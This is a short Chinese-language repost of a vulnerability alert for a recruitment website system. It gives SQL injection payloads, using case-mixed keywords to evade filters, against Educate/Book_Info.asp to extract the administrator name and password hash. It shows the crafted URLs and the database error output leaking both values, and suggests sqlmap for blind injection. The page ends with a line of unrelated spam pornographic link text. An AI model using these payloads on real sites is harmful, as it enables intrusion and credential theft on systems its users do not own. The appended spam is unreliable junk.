網絡求職招聘人才網站系統(tǒng)正式版漏洞漏洞預警 -電腦資料

電腦資料時間：2019-01-01 我要投稿

【m.ddsf.com.cn - 電腦資料】

漏洞出現(xiàn)在Educate/Book_Info.asp

此處注入點雖然過濾了一些關鍵字但是我們還是可以盲注的可以利用sqlmap跑出

exp：如下

查詢管理賬號：+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

查詢管理密碼：+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'

將 nvarchar 值 'hackbase' 轉換為數據類型為 int 的列時發(fā)生語法錯誤，

，

/Educate/Book_Info.asp，行 8

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e07'

將 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 轉換為數據類型為 int 的列時發(fā)生語法錯誤。

/Educate/Book_Info.asp，行 8

相關文章

中国免费看xxx|伊人日韩欧美一区|成人网站在线看。|我操美女在线播放|美女免费视频一区|操狠狠操狠狠网站|亚洲综合日韩精品视频|一区二区三区成人在线|森田咏美AV在线|一本岛av在线亚洲一区国产一区